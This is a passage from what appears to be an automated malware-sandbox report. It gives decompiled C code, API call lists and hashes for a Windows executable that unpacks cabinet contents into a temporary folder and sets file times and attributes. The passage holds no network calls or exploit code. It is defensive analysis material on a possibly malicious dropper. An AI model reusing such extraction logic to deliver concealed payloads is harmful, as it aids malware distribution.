                                                                                                                                                                                                      				long _t59;
                                                                                                                                                                                                      				char* _t63;
                                                                                                                                                                                                      				long _t64;
                                                                                                                                                                                                      				CHAR* _t71;
                                                                                                                                                                                                      				CHAR* _t74;
                                                                                                                                                                                                      				int _t75;
                                                                                                                                                                                                      				signed int _t76;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t69 = __edx;
                                                                                                                                                                                                      				_t29 =  *0x3e8004; // 0x59d037e4
                                                                                                                                                                                                      				_t30 = _t29 ^ _t76;
                                                                                                                                                                                                      				_v8 = _t30;
                                                                                                                                                                                                      				_t75 = _a8;
                                                                                                                                                                                                      				if( *0x3e91d8 == 0) {
                                                                                                                                                                                                      					_t32 = _a4;
                                                                                                                                                                                                      					__eflags = _t32;
                                                                                                                                                                                                      					if(_t32 == 0) {
                                                                                                                                                                                                      						_t33 = E003E4E99(_t75);
                                                                                                                                                                                                      						L35:
                                                                                                                                                                                                      						return E003E6CE0(_t33, _t54, _v8 ^ _t76, _t69, _t73, _t75);
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					_t35 = _t32 - 1;
                                                                                                                                                                                                      					__eflags = _t35;
                                                                                                                                                                                                      					if(_t35 == 0) {
                                                                                                                                                                                                      						L9:
                                                                                                                                                                                                      						_t33 = 0;
                                                                                                                                                                                                      						goto L35;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					_t36 = _t35 - 1;
                                                                                                                                                                                                      					__eflags = _t36;
                                                                                                                                                                                                      					if(_t36 == 0) {
                                                                                                                                                                                                      						_t37 =  *0x3e8584; // 0x0
                                                                                                                                                                                                      						__eflags = _t37;
                                                                                                                                                                                                      						if(_t37 != 0) {
                                                                                                                                                                                                      							SetDlgItemTextA(_t37, 0x837,  *(_t75 + 4));
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						_t54 = 0x3e91e4;
                                                                                                                                                                                                      						_t58 = 0x3e91e4;
                                                                                                                                                                                                      						do {
                                                                                                                                                                                                      							_t38 =  *_t58;
                                                                                                                                                                                                      							_t58 =  &(_t58[1]);
                                                                                                                                                                                                      							__eflags = _t38;
                                                                                                                                                                                                      						} while (_t38 != 0);
                                                                                                                                                                                                      						_t59 = _t58 - 0x3e91e5;
                                                                                                                                                                                                      						__eflags = _t59;
                                                                                                                                                                                                      						_t71 =  *(_t75 + 4);
                                                                                                                                                                                                      						_t73 =  &(_t71[1]);
                                                                                                                                                                                                      						do {
                                                                                                                                                                                                      							_t39 =  *_t71;
                                                                                                                                                                                                      							_t71 =  &(_t71[1]);
                                                                                                                                                                                                      							__eflags = _t39;
                                                                                                                                                                                                      						} while (_t39 != 0);
                                                                                                                                                                                                      						_t69 = _t71 - _t73;
                                                                                                                                                                                                      						_t30 = _t59 + 1 + _t71 - _t73;
                                                                                                                                                                                                      						__eflags = _t30 - 0x104;
                                                                                                                                                                                                      						if(_t30 >= 0x104) {
                                                                                                                                                                                                      							L3:
                                                                                                                                                                                                      							_t33 = _t30 | 0xffffffff;
                                                                                                                                                                                                      							goto L35;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						_t69 = 0x3e91e4;
                                                                                                                                                                                                      						_t30 = E003E4702( &_v268, 0x3e91e4,  *(_t75 + 4));
                                                                                                                                                                                                      						__eflags = _t30;
                                                                                                                                                                                                      						if(__eflags == 0) {
                                                                                                                                                                                                      							goto L3;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						_t41 = E003E476D( &_v268, __eflags);
                                                                                                                                                                                                      						__eflags = _t41;
                                                                                                                                                                                                      						if(_t41 == 0) {
                                                                                                                                                                                                      							goto L9;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						_push(0x180);
                                                                                                                                                                                                      						_t30 = E003E4980( &_v268, 0x8302); // executed
                                                                                                                                                                                                      						_t75 = _t30;
                                                                                                                                                                                                      						__eflags = _t75 - 0xffffffff;
                                                                                                                                                                                                      						if(_t75 == 0xffffffff) {
                                                                                                                                                                                                      							goto L3;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						_t30 = E003E47E0( &_v268);
                                                                                                                                                                                                      						__eflags = _t30;
                                                                                                                                                                                                      						if(_t30 == 0) {
                                                                                                                                                                                                      							goto L3;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						 *0x3e93f4 =  *0x3e93f4 + 1;
                                                                                                                                                                                                      						_t33 = _t75;
                                                                                                                                                                                                      						goto L35;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					_t44 = _t36 - 1;
                                                                                                                                                                                                      					__eflags = _t44;
                                                                                                                                                                                                      					if(_t44 == 0) {
                                                                                                                                                                                                      						_t54 = 0x3e91e4;
                                                                                                                                                                                                      						_t63 = 0x3e91e4;
                                                                                                                                                                                                      						do {
                                                                                                                                                                                                      							_t45 =  *_t63;
                                                                                                                                                                                                      							_t63 =  &(_t63[1]);
                                                                                                                                                                                                      							__eflags = _t45;
                                                                                                                                                                                                      						} while (_t45 != 0);
                                                                                                                                                                                                      						_t74 =  *(_t75 + 4);
                                                                                                                                                                                                      						_t64 = _t63 - 0x3e91e5;
                                                                                                                                                                                                      						__eflags = _t64;
                                                                                                                                                                                                      						_t69 =  &(_t74[1]);
                                                                                                                                                                                                      						do {
                                                                                                                                                                                                      							_t46 =  *_t74;
                                                                                                                                                                                                      							_t74 =  &(_t74[1]);
                                                                                                                                                                                                      							__eflags = _t46;
                                                                                                                                                                                                      						} while (_t46 != 0);
                                                                                                                                                                                                      						_t73 = _t74 - _t69;
                                                                                                                                                                                                      						_t30 = _t64 + 1 + _t74 - _t69;
                                                                                                                                                                                                      						__eflags = _t30 - 0x104;
                                                                                                                                                                                                      						if(_t30 >= 0x104) {
                                                                                                                                                                                                      							goto L3;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						_t69 = 0x3e91e4;
                                                                                                                                                                                                      						_t30 = E003E4702( &_v268, 0x3e91e4,  *(_t75 + 4));
                                                                                                                                                                                                      						__eflags = _t30;
                                                                                                                                                                                                      						if(_t30 == 0) {
                                                                                                                                                                                                      							goto L3;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						_t69 =  *((intOrPtr*)(_t75 + 0x18));
                                                                                                                                                                                                      						_t30 = E003E4C37( *((intOrPtr*)(_t75 + 0x14)),  *((intOrPtr*)(_t75 + 0x18)),  *(_t75 + 0x1a) & 0x0000ffff); // executed
                                                                                                                                                                                                      						__eflags = _t30;
                                                                                                                                                                                                      						if(_t30 == 0) {
                                                                                                                                                                                                      							goto L3;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						E003E4B60( *((intOrPtr*)(_t75 + 0x14))); // executed
                                                                                                                                                                                                      						_t50 =  *(_t75 + 0x1c) & 0x0000ffff;
                                                                                                                                                                                                      						__eflags = _t50;
                                                                                                                                                                                                      						if(_t50 != 0) {
                                                                                                                                                                                                      							_t51 = _t50 & 0x00000027;
                                                                                                                                                                                                      							__eflags = _t51;
                                                                                                                                                                                                      						} else {
                                                                                                                                                                                                      							_t51 = 0x80;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						_t30 = SetFileAttributesA( &_v268, _t51); // executed
                                                                                                                                                                                                      						__eflags = _t30;
                                                                                                                                                                                                      						if(_t30 == 0) {
                                                                                                                                                                                                      							goto L3;
                                                                                                                                                                                                      						} else {
                                                                                                                                                                                                      							_t33 = 1;
                                                                                                                                                                                                      							goto L35;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					_t30 = _t44 - 1;
                                                                                                                                                                                                      					__eflags = _t30;
                                                                                                                                                                                                      					if(_t30 == 0) {
                                                                                                                                                                                                      						goto L3;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					goto L9;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				if(_a4 == 3) {
                                                                                                                                                                                                      					_t30 = E003E4B60( *((intOrPtr*)(_t75 + 0x14)));
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				goto L3;
                                                                                                                                                                                                      			}































                                                                                                                                                                                                      0x003e4df4
                                                                                                                                                                                                      0x003e4df6
                                                                                                                                                                                                      0x003e4df9
                                                                                                                                                                                                      0x003e4dfc
                                                                                                                                                                                                      0x003e4dfc
                                                                                                                                                                                                      0x003e4dfe
                                                                                                                                                                                                      0x003e4dff
                                                                                                                                                                                                      0x003e4dff
                                                                                                                                                                                                      0x003e4e03
                                                                                                                                                                                                      0x003e4e08
                                                                                                                                                                                                      0x003e4e0a
                                                                                                                                                                                                      0x003e4e0f
                                                                                                                                                                                                      0x003e4d03
                                                                                                                                                                                                      0x003e4d03
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e4d03
                                                                                                                                                                                                      0x003e4e18
                                                                                                                                                                                                      0x003e4e20
                                                                                                                                                                                                      0x003e4e25
                                                                                                                                                                                                      0x003e4e27
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e4e33
                                                                                                                                                                                                      0x003e4e38
                                                                                                                                                                                                      0x003e4e3a
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e4e40
                                                                                                                                                                                                      0x003e4e51
                                                                                                                                                                                                      0x003e4e56
                                                                                                                                                                                                      0x003e4e5b
                                                                                                                                                                                                      0x003e4e5e
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e4e6a
                                                                                                                                                                                                      0x003e4e6f
                                                                                                                                                                                                      0x003e4e71
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e4e77
                                                                                                                                                                                                      0x003e4e7d
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e4e7d
                                                                                                                                                                                                      0x003e4d25
                                                                                                                                                                                                      0x003e4d25
                                                                                                                                                                                                      0x003e4d28
                                                                                                                                                                                                      0x003e4d36
                                                                                                                                                                                                      0x003e4d3b
                                                                                                                                                                                                      0x003e4d40
                                                                                                                                                                                                      0x003e4d40
                                                                                                                                                                                                      0x003e4d42
                                                                                                                                                                                                      0x003e4d43
                                                                                                                                                                                                      0x003e4d43
                                                                                                                                                                                                      0x003e4d47
                                                                                                                                                                                                      0x003e4d4a
                                                                                                                                                                                                      0x003e4d4a
                                                                                                                                                                                                      0x003e4d4c
                                                                                                                                                                                                      0x003e4d4f
                                                                                                                                                                                                      0x003e4d4f
                                                                                                                                                                                                      0x003e4d51
                                                                                                                                                                                                      0x003e4d52
                                                                                                                                                                                                      0x003e4d52
                                                                                                                                                                                                      0x003e4d56
                                                                                                                                                                                                      0x003e4d5b
                                                                                                                                                                                                      0x003e4d5d
                                                                                                                                                                                                      0x003e4d62
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e4d67
                                                                                                                                                                                                      0x003e4d6f
                                                                                                                                                                                                      0x003e4d74
                                                                                                                                                                                                      0x003e4d76
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e4d7c
                                                                                                                                                                                                      0x003e4d84
                                                                                                                                                                                                      0x003e4d89
                                                                                                                                                                                                      0x003e4d8b
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e4d94
                                                                                                                                                                                                      0x003e4d99
                                                                                                                                                                                                      0x003e4d9e
                                                                                                                                                                                                      0x003e4da1
                                                                                                                                                                                                      0x003e4daa
                                                                                                                                                                                                      0x003e4daa
                                                                                                                                                                                                      0x003e4da3
                                                                                                                                                                                                      0x003e4da3
                                                                                                                                                                                                      0x003e4da3
                                                                                                                                                                                                      0x003e4db5
                                                                                                                                                                                                      0x003e4dbb
                                                                                                                                                                                                      0x003e4dbd
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e4dc3
                                                                                                                                                                                                      0x003e4dc5
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e4dc5
                                                                                                                                                                                                      0x003e4dbd
                                                                                                                                                                                                      0x003e4d2a
                                                                                                                                                                                                      0x003e4d2a
                                                                                                                                                                                                      0x003e4d2d
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e4d2d
                                                                                                                                                                                                      0x003e4cf8
                                                                                                                                                                                                      0x003e4cfd
                                                                                                                                                                                                      0x003e4d02
                                                                                                                                                                                                      0x00000000

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • SetFileAttributesA.KERNELBASE(?,?,?,?), ref: 003E4DB5
                                                                                                                                                                                                      • SetDlgItemTextA.USER32(00000000,00000837,?), ref: 003E4DDD
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000001.00000002.436245318.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000001.00000002.436227049.00000000003E0000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                      • Associated: 00000001.00000002.436296879.00000000003E8000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                      • Associated: 00000001.00000002.436318201.00000000003EA000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                      • Associated: 00000001.00000002.436318201.00000000003EC000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_3e0000_shS06Up82.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: AttributesFileItemText
                                                                                                                                                                                                      • String ID: C:\Users\user\AppData\Local\Temp\IXP001.TMP\
                                                                                                                                                                                                      • API String ID: 3625706803-2356899610
                                                                                                                                                                                                      • Opcode ID: abe108a8da025a7603d6a9d687ba56d12111c178492dca8fcb453f7e7564d54b
                                                                                                                                                                                                      • Instruction ID: 48c8960df22f2a904d25c7a154211f11c6f63bfbdd3a16c97c1dc4933fc4d2e1
                                                                                                                                                                                                      • Opcode Fuzzy Hash: abe108a8da025a7603d6a9d687ba56d12111c178492dca8fcb453f7e7564d54b
                                                                                                                                                                                                      • Instruction Fuzzy Hash: F04126366001A59BCB238F2ADD447F673A9EB8D300F154769D8829B6C2DA31DE46C790
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                                                                      			E003E4C37(signed int __ecx, int __edx, int _a4) {
                                                                                                                                                                                                      				struct _FILETIME _v12;
                                                                                                                                                                                                      				struct _FILETIME _v20;
                                                                                                                                                                                                      				FILETIME* _t14;
                                                                                                                                                                                                      				int _t15;
                                                                                                                                                                                                      				signed int _t21;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t21 = __ecx * 0x18;
                                                                                                                                                                                                      				if( *((intOrPtr*)(_t21 + 0x3e8d64)) == 1 || DosDateTimeToFileTime(__edx, _a4,  &_v20) == 0 || LocalFileTimeToFileTime( &_v20,  &_v12) == 0) {
                                                                                                                                                                                                      					L5:
                                                                                                                                                                                                      					return 0;
                                                                                                                                                                                                      				} else {
                                                                                                                                                                                                      					_t14 =  &_v12;
                                                                                                                                                                                                      					_t15 = SetFileTime( *(_t21 + 0x3e8d74), _t14, _t14, _t14); // executed
                                                                                                                                                                                                      					if(_t15 == 0) {
                                                                                                                                                                                                      						goto L5;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					return 1;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      			}









                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • DosDateTimeToFileTime.KERNEL32(?,?,?), ref: 003E4C54
                                                                                                                                                                                                      • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 003E4C66
                                                                                                                                                                                                      • SetFileTime.KERNELBASE(?,?,?,?), ref: 003E4C7E
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000001.00000002.436245318.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000001.00000002.436227049.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000001.00000002.436296879.00000000003E8000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000001.00000002.436318201.00000000003EA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000001.00000002.436318201.00000000003EC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_3e0000_shS06Up82.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Time$File$DateLocal
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 2071732420-0
                                                                                                                                                                                                      • Opcode ID: 0fac67975e7c6035fa602ca9a38d373e93d21d9951fdd561c90661ccffed8e86
                                                                                                                                                                                                      • Instruction ID: 4c95d6287f784f2fa7f1928215d5d35915ffd4b62acdccfa9cd7643926d502c4
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0fac67975e7c6035fa602ca9a38d373e93d21d9951fdd561c90661ccffed8e86
                                                                                                                                                                                                      • Instruction Fuzzy Hash: EEF0627250125CBB9B26DFA6CC489FB77ACEB0C344B44072AA415C20D0EA30F914D761
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      C-Code - Quality: 75%
                                                                                                                                                                                                      			E003E487A(CHAR* __ecx, signed int __edx) {
                                                                                                                                                                                                      				void* _t7;
                                                                                                                                                                                                      				CHAR* _t11;
                                                                                                                                                                                                      				long _t18;
                                                                                                                                                                                                      				long _t23;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t11 = __ecx;
                                                                                                                                                                                                      				asm("sbb edi, edi");
                                                                                                                                                                                                      				_t18 = ( ~(__edx & 3) & 0xc0000000) + 0x80000000;
                                                                                                                                                                                                      				if((__edx & 0x00000100) == 0) {
                                                                                                                                                                                                      					asm("sbb esi, esi");
                                                                                                                                                                                                      					_t23 = ( ~(__edx & 0x00000200) & 0x00000002) + 3;
                                                                                                                                                                                                      				} else {
                                                                                                                                                                                                      					if((__edx & 0x00000400) == 0) {
                                                                                                                                                                                                      						asm("sbb esi, esi");
                                                                                                                                                                                                      						_t23 = ( ~(__edx & 0x00000200) & 0xfffffffe) + 4;
                                                                                                                                                                                                      					} else {
                                                                                                                                                                                                      						_t23 = 1;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				_t7 = CreateFileA(_t11, _t18, 0, 0, _t23, 0x80, 0); // executed
                                                                                                                                                                                                      				if(_t7 != 0xffffffff || _t23 == 3) {
                                                                                                                                                                                                      					return _t7;
                                                                                                                                                                                                      				} else {
                                                                                                                                                                                                      					E003E490C(_t11);
                                                                                                                                                                                                      					return CreateFileA(_t11, _t18, 0, 0, _t23, 0x80, 0);
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      			}








                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • CreateFileA.KERNELBASE(00008000,-80000000,00000000,00000000,?,00000080,00000000,00000000,00000000,00000000,003E4A23,?,003E4F67,*MEMCAB,00008000,00000180), ref: 003E48DE
                                                                                                                                                                                                      • CreateFileA.KERNEL32(00008000,-80000000,00000000,00000000,?,00000080,00000000,?,003E4F67,*MEMCAB,00008000,00000180), ref: 003E4902
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000001.00000002.436245318.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
• Associated: 00000001.00000002.436227049.00000000003E0000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.436296879.00000000003E8000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.436318201.00000000003EA000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.436318201.00000000003EC000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_3e0000_shS06Up82.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: CreateFile
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 823142352-0
                                                                                                                                                                                                      • Opcode ID: 0c7b21e62dbfdef5b6b4d005b1e5b40e464944718f0f48ffe8ba2a05b67719e1
                                                                                                                                                                                                      • Instruction ID: 4b788196f5258f0e2454750387a64e06fcaf728ba37859ae6517cbf8dee5d0de
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0c7b21e62dbfdef5b6b4d005b1e5b40e464944718f0f48ffe8ba2a05b67719e1
                                                                                                                                                                                                      • Instruction Fuzzy Hash: D0016DA3E115B026F326402A4C88FB7551CCBDA734F1B0334BDEAEB1D2D6A55C0491E0
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      C-Code - Quality: 93%
                                                                                                                                                                                                      			E003E4AD0(signed int _a4, void* _a8, long _a12) {
                                                                                                                                                                                                      				signed int _t9;
                                                                                                                                                                                                      				int _t12;
                                                                                                                                                                                                      				signed int _t14;
                                                                                                                                                                                                      				signed int _t15;
                                                                                                                                                                                                      				void* _t20;
                                                                                                                                                                                                      				struct HWND__* _t21;
                                                                                                                                                                                                      				signed int _t24;
                                                                                                                                                                                                      				signed int _t25;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t20 =  *0x3e858c; // 0x268
                                                                                                                                                                                                      				_t9 = E003E3680(_t20);
                                                                                                                                                                                                      				if( *0x3e91d8 == 0) {
                                                                                                                                                                                                      					_push(_t24);
                                                                                                                                                                                                      					_t12 = WriteFile( *(0x3e8d74 + _a4 * 0x18), _a8, _a12,  &_a12, 0); // executed
                                                                                                                                                                                                      					if(_t12 != 0) {
                                                                                                                                                                                                      						_t25 = _a12;
                                                                                                                                                                                                      						if(_t25 != 0xffffffff) {
                                                                                                                                                                                                      							_t14 =  *0x3e9400; // 0x100c00
                                                                                                                                                                                                      							_t15 = _t14 + _t25;
                                                                                                                                                                                                      							 *0x3e9400 = _t15;
                                                                                                                                                                                                      							if( *0x3e8184 != 0) {
                                                                                                                                                                                                      								_t21 =  *0x3e8584; // 0x0
                                                                                                                                                                                                      								if(_t21 != 0) {
                                                                                                                                                                                                      									SendDlgItemMessageA(_t21, 0x83a, 0x402, _t15 * 0x64 /  *0x3e93f8, 0);
                                                                                                                                                                                                      								}
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      					} else {
                                                                                                                                                                                                      						_t25 = _t24 | 0xffffffff;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					return _t25;
                                                                                                                                                                                                      				} else {
                                                                                                                                                                                                      					return _t9 | 0xffffffff;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      			}












                                                                                                                                                                                                      APIs
                                                                                                                                                                                                        • Part of subcall function 003E3680: MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000004FF), ref: 003E369F
                                                                                                                                                                                                        • Part of subcall function 003E3680: PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 003E36B2
                                                                                                                                                                                                        • Part of subcall function 003E3680: PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 003E36DA
                                                                                                                                                                                                      • WriteFile.KERNELBASE(?,?,?,?,00000000), ref: 003E4B05
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000001.00000002.436245318.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000001.00000002.436227049.00000000003E0000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                      • Associated: 00000001.00000002.436296879.00000000003E8000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                      • Associated: 00000001.00000002.436318201.00000000003EA000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                      • Associated: 00000001.00000002.436318201.00000000003EC000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_3e0000_shS06Up82.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: MessagePeek$FileMultipleObjectsWaitWrite
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 1084409-0
                                                                                                                                                                                                      • Opcode ID: 51cd4fd802f0bed0d485f76b0f79219554b8b2233a1c30a13603f50e37aa0dfe
                                                                                                                                                                                                      • Instruction ID: c371c5b8afd4776e8b0e5f44262d5bc79b09c345c6d6b61c18978a56a13ae6cc
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 51cd4fd802f0bed0d485f76b0f79219554b8b2233a1c30a13603f50e37aa0dfe
                                                                                                                                                                                                      • Instruction Fuzzy Hash: E7018031600295ABDB278F6ADC85BA2775EF748725F058325F9799F5E0CB70D811CB40
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                                                                      			E003E658A(char* __ecx, void* __edx, char* _a4) {
                                                                                                                                                                                                      				intOrPtr _t4;
                                                                                                                                                                                                      				char* _t6;
                                                                                                                                                                                                      				char* _t8;
                                                                                                                                                                                                      				void* _t10;
                                                                                                                                                                                                      				void* _t12;
                                                                                                                                                                                                      				char* _t16;
                                                                                                                                                                                                      				intOrPtr* _t17;
                                                                                                                                                                                                      				void* _t18;
                                                                                                                                                                                                      				char* _t19;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t16 = __ecx;
                                                                                                                                                                                                      				_t10 = __edx;
                                                                                                                                                                                                      				_t17 = __ecx;
                                                                                                                                                                                                      				_t1 = _t17 + 1; // 0x3e8b3f
                                                                                                                                                                                                      				_t12 = _t1;
                                                                                                                                                                                                      				do {
                                                                                                                                                                                                      					_t4 =  *_t17;
                                                                                                                                                                                                      					_t17 = _t17 + 1;
                                                                                                                                                                                                      				} while (_t4 != 0);
                                                                                                                                                                                                      				_t18 = _t17 - _t12;
                                                                                                                                                                                                      				_t2 = _t18 + 1; // 0x3e8b40
                                                                                                                                                                                                      				if(_t2 < __edx) {
                                                                                                                                                                                                      					_t19 = _t18 + __ecx;
                                                                                                                                                                                                      					if(_t19 > __ecx) {
                                                                                                                                                                                                      						_t8 = CharPrevA(__ecx, _t19); // executed
                                                                                                                                                                                                      						if( *_t8 != 0x5c) {
                                                                                                                                                                                                      							 *_t19 = 0x5c;
                                                                                                                                                                                                      							_t19 =  &(_t19[1]);
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					_t6 = _a4;
                                                                                                                                                                                                      					 *_t19 = 0;
                                                                                                                                                                                                      					while( *_t6 == 0x20) {
                                                                                                                                                                                                      						_t6 = _t6 + 1;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					return E003E16B3(_t16, _t10, _t6);
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				return 0x8007007a;
                                                                                                                                                                                                      			}













                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • CharPrevA.USER32(003E8B3E,003E8B3F,00000001,003E8B3E,-00000003,?,003E60EC,003E1140,?), ref: 003E65BA
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000001.00000002.436245318.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000001.00000002.436227049.00000000003E0000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                      • Associated: 00000001.00000002.436296879.00000000003E8000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                      • Associated: 00000001.00000002.436318201.00000000003EA000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                      • Associated: 00000001.00000002.436318201.00000000003EC000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_3e0000_shS06Up82.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: CharPrev
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 122130370-0
                                                                                                                                                                                                      • Opcode ID: 4fd6d907d199019e02df5719740c3d1ddbaec8349c664c6c745ae54faabeb1ff
                                                                                                                                                                                                      • Instruction ID: c3cb716f2bce9e0cbc2c89dd0915ffb721521d42364ee23f9ad64d8fe32b1c5b
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4fd6d907d199019e02df5719740c3d1ddbaec8349c664c6c745ae54faabeb1ff
                                                                                                                                                                                                      • Instruction Fuzzy Hash: A8F02D323042F09BD333051B9884B67BFDD9BA7390F15075EE8DA872C5CA655C4583A4
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      C-Code - Quality: 93%
                                                                                                                                                                                                      			E003E621E() {
                                                                                                                                                                                                      				signed int _v8;
                                                                                                                                                                                                      				char _v268;
                                                                                                                                                                                                      				signed int _t5;
                                                                                                                                                                                                      				void* _t9;
                                                                                                                                                                                                      				void* _t13;
                                                                                                                                                                                                      				void* _t19;
